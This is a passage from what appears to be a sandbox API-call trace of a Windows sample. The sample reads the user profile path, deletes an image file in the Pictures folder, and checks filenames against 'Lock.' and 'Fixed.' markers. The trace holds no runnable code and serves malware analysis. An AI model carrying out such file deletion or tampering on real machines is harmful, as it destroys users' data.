lpMsg=0x8bf4b0) returned 0 [0255.044] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.045] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.045] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.045] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.045] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.045] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.045] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.045] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.045] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.045] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.045] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.045] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.046] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.046] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0255.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.046] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.046] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.046] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.046] FreeLibrary (hLibModule=0x74d40000) returned 1 [0255.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.049] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.052] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.054] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.054] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.054] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0255.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/E3PCt.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E3PCt.png", lpFilePart=0x8bedfc*="E3PCt.png") returned 0x30 [0255.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0255.056] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E3PCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e3pct.png")) returned 0x20 [0255.056] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E3PCt.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4be920, ftCreationTime.dwHighDateTime=0x1d4c90a, ftLastAccessTime.dwLowDateTime=0x9548a390, ftLastAccessTime.dwHighDateTime=0x1d4c80e, ftLastWriteTime.dwLowDateTime=0x9548a390, ftLastWriteTime.dwHighDateTime=0x1d4c80e, nFileSizeHigh=0x0, nFileSizeLow=0x7dc5, dwReserved0=0x1545, dwReserved1=0x4, cFileName="E3PCt.png", cAlternateFileName="")) returned 0xaa57a0 [0255.056] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E3PCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e3pct.png")) returned 1 [0255.059] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4be920, ftCreationTime.dwHighDateTime=0x1d4c90a, ftLastAccessTime.dwLowDateTime=0x9548a390, ftLastAccessTime.dwHighDateTime=0x1d4c80e, ftLastWriteTime.dwLowDateTime=0x9548a390, ftLastWriteTime.dwHighDateTime=0x1d4c80e, nFileSizeHigh=0x0, nFileSizeLow=0x7dc5, dwReserved0=0x1545, dwReserved1=0x4, cFileName="E3PCt.png", cAlternateFileName="")) returned 0 [0255.059] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0255.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.060] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0255.060] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0255.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0255.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.061] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0255.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0255.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/E3PCt.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E3PCt.png", lpFilePart=0x8bf658*="E3PCt.png") returned 0x30 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0255.064] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E3PCt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e3pct.png")) returned 0xffffffff [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.064] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0255.064] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.064] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FSvM9zg.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SvM9zg.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vM9zg.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9zg.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9zg.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.066] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0255.067] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0255.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0255.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FSvM9zg.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SvM9zg.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vM9zg.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9zg.png", 